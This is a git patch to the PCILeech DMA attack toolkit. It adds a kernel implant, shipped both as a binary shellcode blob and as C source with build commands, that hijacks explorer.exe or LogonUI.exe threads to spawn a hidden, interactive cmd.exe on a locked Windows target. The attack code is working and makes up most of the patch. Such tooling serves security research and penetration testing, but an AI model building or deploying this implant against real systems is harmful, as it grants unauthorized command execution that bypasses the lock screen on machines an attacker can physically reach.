From a8f9bfc79d50388ebd84f634aa4e4b787e7e2f30 Mon Sep 17 00:00:00 2001
From: ufrisk <github_ufrisk@frizk.net>
Date: Thu, 29 Sep 2016 23:10:14 +0200
Subject: [PATCH] new implant: spawn cmd in user context [wx64_pscmd_user]

---
 pcileech_files/wx64_pscmd_user.ksh | Bin 0 -> 8104 bytes
 pcileech_shellcode/wx64_pscreate.c |  17 ++++++++++++++---
 readme.md                          |   3 +++
 3 files changed, 17 insertions(+), 3 deletions(-)
 create mode 100644 pcileech_files/wx64_pscmd_user.ksh

diff --git a/pcileech_files/wx64_pscmd_user.ksh b/pcileech_files/wx64_pscmd_user.ksh
new file mode 100644
index 0000000000000000000000000000000000000000..f57787695f7e597e6c0909906c841883e0ef4998
GIT binary patch
literal 8104
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

literal 0
HcmV?d00001

diff --git a/pcileech_shellcode/wx64_pscreate.c b/pcileech_shellcode/wx64_pscreate.c
index 4538b66..4d0b71d 100644
--- a/pcileech_shellcode/wx64_pscreate.c
+++ b/pcileech_shellcode/wx64_pscreate.c
@@ -12,9 +12,15 @@
 //
 // ALTERNATIVELY (wx64_pscmd):
 // cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel wx64_common.c
-// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel /D_PSCMD wx64_pscreate.c
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel /D_PSCMD /D_PSCMD_SYSTEM wx64_pscreate.c
 // ml64 wx64_common_a.asm /Fewx64_pscmd.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main wx64_pscreate.obj wx64_common.obj
 // shellcode64.exe -o wx64_pscmd.exe "PROCESS CREATOR - AUTOMATICALLY SPAWN CMD.EXE ON TARGET!        \n================================================================\nAutomatically spawn a CMD.EXE on the target system. This utility\nonly work if the target system is locked and the login screen is\nvisible. If it takes time waiting - then please touch any key on\nthe target system.   If the utility fails multiple times, please\ntry wx64_pscreate instead.                                      \n===== DETAILED INFORMATION AFTER PROCESS CREATION ATTEMPT ======%s\nNTSTATUS        : 0x%08X                                        \nADDITIONAL INFO : 0x%04X                                        \n================================================================\n"
+//
+// ALTERNATIVELY (wx64_pscmd_user):
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel wx64_common.c
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel /D_PSCMD /D_PSCMD_USER wx64_pscreate.c
+// ml64 wx64_common_a.asm /Fewx64_pscmd_user.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main wx64_pscreate.obj wx64_common.obj
+// shellcode64.exe -o wx64_pscmd_user.exe "PROCESS CREATOR - AUTOMATICALLY SPAWN CMD.EXE AS USER ON TARGET!        \n================================================================\nAutomatically spawn a CMD.EXE on the target system. This utility\nwill spawn a cmd.exe in the context of a random logged on user.\nThis will work even though the computer may be locked. If this\nutility fails multiple times, please try wx64_pscreate instead.                                      \n===== DETAILED INFORMATION AFTER PROCESS CREATION ATTEMPT ======%s\nNTSTATUS        : 0x%08X                                        \nADDITIONAL INFO : 0x%04X                                        \n================================================================\n"
 #include "wx64_common.h"
 
 #define MAGIC_WAIT_WORD					0x01234123412341234
@@ -717,13 +723,18 @@ VOID c_EntryPoint(_In_ PKMDDATA pk)
 	KERNEL_FUNCTIONS2 fnk2;
 	InitializeKernelFunctions(pk->AddrKernelBase, &fnk);
 	InitializeKernelFunctions2(pk->AddrKernelBase, &fnk2);
+#ifdef _PSCMD_SYSTEM
+	CHAR szBINARY[] = { 'L', 'o', 'g', 'o', 'n', 'U', 'I', '.', 'e', 'x', 'e', 0 };
+#endif _PSCMD_SYSTEM
+#ifdef _PSCMD_USER
+	CHAR szBINARY[] = { 'e', 'x', 'p', 'l', 'o', 'r', 'e', 'r', '.', 'e', 'x', 'e', 0 };
+#endif _PSCMD_USER
 #ifdef _PSCMD
-	CHAR szLOGONUI[] = { 'L', 'o', 'g', 'o', 'n', 'U', 'I', '.', 'e', 'x', 'e', 0 };
 	CHAR szCMD[] = { 'c', ':', '\\', 'w', 'i', 'n', 'd', 'o', 'w', 's', '\\', 's', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'c', 'm', 'd', '.', 'e', 'x', 'e', 0 };
 	pk->dataIn[1] = 0x08000000; // hidden window
 	pk->dataIn[2] = 1; // interactive
 	pk->dataIn[4] = 1; // multi thread hijack (boost)
-	pk->dataOut[0] = GetPidFromPsName(&fnk, &fnk2, szLOGONUI, &pk->dataIn[0]);
+	pk->dataOut[0] = GetPidFromPsName(&fnk, &fnk2, szBINARY, &pk->dataIn[0]);
 	if(pk->dataOut[0]) {
 		pk->dataOut[1] = 0x101;
 		return;
diff --git a/readme.md b/readme.md
index 889c2e2..0f5a501 100644
--- a/readme.md
+++ b/readme.md
@@ -133,3 +133,6 @@ v1.2
 * signature: Windows 10 updated.
 * signature: macOS Sierra added.
 * other: various bug fixes and stability improvements.
+
+latest
+* new implant: spawn cmd in user context [wx64_pscmd_user]